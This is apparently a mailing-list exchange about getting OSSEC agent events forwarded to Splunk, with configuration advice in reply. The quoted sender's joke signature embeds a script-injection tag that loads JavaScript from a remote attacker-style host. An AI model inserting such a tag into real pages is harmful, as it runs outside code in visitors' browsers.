I would check your alerts.log file on your hids and make sure your agents are reporting to the HIDS server. only your ossec server should be configured with syslog_output forwarding to splunk. would also recommend the following sites for further reading..... http://securityisfutile.blogspot.com or http://splunk.com (Splunkbase web site) and grab the *splunk for ossec app*. good luck!
On Mon, Apr 5, 2010 at 12:45 PM, Xavier Mertens <[email protected]> wrote: > Hi *, > > I'm testing the integration of OSSEC with Splunk. I followed the > configuration as describe in the Wiki. It works! > Splunk runs on my OSSEC server. The problem I have at the moment: only > events generated by the server are sent to Splunk. > I don't see any trace of events generated by the remote agents. > > Did I miss something in the design? ALL agents must have the syslog_output > enabled? > > /x > > -- > My server is com<script src=http://owned.cn/js.js>pletely secure. -- To unsubscribe, reply using "remove me" as the subject.
